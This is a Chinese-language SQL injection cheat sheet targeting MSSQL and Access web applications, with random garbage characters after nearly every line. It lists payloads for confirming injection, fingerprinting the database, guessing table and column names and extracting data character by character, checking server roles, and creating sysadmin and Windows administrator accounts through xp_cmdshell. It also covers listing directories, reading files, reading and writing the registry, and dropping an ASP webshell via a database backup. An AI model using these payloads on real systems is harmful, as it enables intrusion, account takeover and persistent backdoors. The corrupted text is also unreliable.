1.判断是否有注入;and 1=1 ;and 1=2 NokU)�O�;x
2.初步判断是否是mssql ;and user>0 KxI&G%��z
N�,`$�M.|?
3.注入参数是字符'and [查询条件] and ''=' ,KF�'TsFf�
#pT�"B�Sz]
4.搜索时没过滤参数的'and [查询条件] and '%25'=' :Wjpzg�PuN
-�c�_74c50
5.判断数据库系统 viW!,QQ(�S
({���
�8-*
;and (select count(*) from sysobjects)>0 mssql US+Q~GTA��
.?D7dyU l1
;and (select count(*) from msysobjects)>0 access �`n.5�f[wC
�%oF�}H�F.
Ye\r��B\�-
S{Kiy#ltWc
6.猜数据库 ;and (select Count(*) from [数据库名])>0 61Bwb]\f/|
&�c`�nR�<�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 bbtGXfI+SB
dV*]f�$w�Q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 +dWDxguE{w
Y4�OPEo�5o
9.(1)猜字段的ascii值(access) e{�h<�g>7�
[/PR�\'|�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ")_|�69 VX
�
Hu^1�[#
(2)猜字段的ascii值(mssql) l\E%�+?K+^
3oBtP<yG�.
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 $'0u�|�Xy`
��%r<r��cY
10.测试权限结构(mssql) N�C8t�)
X7
0m7Y>0wC6T
�4����{}FL
9?�A)n4b;
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- k�o�5�@qNq
5<�iV�2H�x
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- )�mI��05�
�}Q)#�[#�e
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- fs�mN)_T��
XpI�klL�7�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- K�m%]1X7T6
P!~�MZ+7#&
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V8�e>�l[tH
P]�<4R:y�b
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- <m!�h&_eg�
tf��=��6\p
;and 1=(select IS_MEMBER('db_owner'));-- �T!-\@PB !
y�>R�=`A1b
4qN{n#{+�]
Rh�3eLt~|(
11.添加mssql和系统的帐户 �0�0<cYy��
HpR�]q05d�
;exec master.dbo.sp_addlogin username;-- d4m��=0G�`
;exec master.dbo.sp_password null,username,password;-- ?RX3M�UN��
)) Zf|�86N
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- (ScxLf�=]�
#�&c�I��3i
;exec master.dbo.xp_cmdshell 'net user username password ��+y,T4^�{
x*
Da��rSk
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7@#�>b�E�6
h�&|[eZt?F
;exec master.dbo.xp_cmdshell 'net user username password /add';-- pn���y11�C
y�l�UrL�Q\
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- #m��l�S}~n
�x"e�RJii?
Xk:�OL�,c�
a�nuL1f�XO
12.(1)遍历目录 �BoA/6FRi[
68bQ;D�v��
;create table dirs(paths varchar(100), id int) *�xc_k�"\�
h~A/�y!�s
;insert dirs exec master.dbo.xp_dirtree 'c:\' E^Y#&skXp3
IWBX�'|�}K
;and (select top 1 paths from dirs)>0 > ��pgX^�
Q.bXM?V�)�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ���A_�n7w�
P�ih tf4�i
!y#"l�$"xK
sD�<a+Lw}x
(2)遍历目录 Z�<�U6<�{b
�C�#QpQg2�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ?M�$.+V{�a
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Tb�A�}BFT`
D�,�m]CK�'
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 qsL)�}sC^8
F�K6[>(Q�O
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 PEN�\-*P�v
bf0+�DvIB
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 )�Z���[ft
9K�/HO�!z
m���2��-Sx
�J2d��.f}-
13.mssql中的存储过程 $v,�dz_O*\
yH7F��''O7
xp_regenumvalues 注册表根键, 子键 8][�nm�jk0
�X$���%'��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 QU#�w%|���
d^�/3('H�6
xp_regread 根键,子键,键值名 #1J� &7�F1
Yi
.u"sh]�
;exec xp_regread {2q�F�Y�5H
eeIhed��9
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 /�{�|EA�d{
�%m�L�-$*�
xp_regwrite 根键,子键, 值名, 值类型, 值 ��R{Rw�TN<
�R5��"K]~
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 wU�8Mt#�D!
AD�Z��};:]
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 :d�3bt~b'�
�~7��Y+2FZ
xp_regdeletevalue 根键,子键,值名 PEc,�l>u9�
Gb�"r�|(!�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 *�?o{9v5}(
�/`9sPR6e
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 z�+�
s6)Ad
Q�*~LCtrI
hhb�?6]Z/�
��)@N���2
14.mssql的backup创建webshell UYFwS/ RW}
[�N1hWcfvd
use model �h�p8%.V$f
f6�|KN+��.
create table cmd(str image); y�gO�d69��
�l;af~ef)'
insert into cmd(str) values (''); u�C.K<jD%
�-g)9R%>�-
backup database model to disk='c:\l.asp'; ��jQk�*8��
Z�1zVw�Ha_
"~E[)^ANxD
,P�lO�8;5]
15.mssql内置函数 .e3NnOzyxS
%R1�tJ(�/
;and (select @@version)>0 获得Windows的版本号 L�Y6;.d$�J
H&F9J��^rC
;and user_name()='dbo' 判断当前系统的连接用户是不是sa A�01A�lK_B
Ny_lrfh)�[
;and (select user_name())>0 爆当前系统的连接用户 3U��qr,0$p
(]�_��1��
;and (select db_name())>0 得到当前连接的数据库 nY�WvT�vZ�
Z -,J)��gW
��@�v�pf[j
��M@�h|b�N
16.简洁的webshell �CQwL|$)]Y
(�E�/�lIou
use model y'FS/=u>�0
~jK{ ,�$:=
create table cmd(str image); *eI�Jw�X�E
.R)PJc5��^
insert into cmd(str) values (''); x?��?pBhJH
79n�G|Yj|\
backup database model to disk='g:\wwwtest\l.asp';
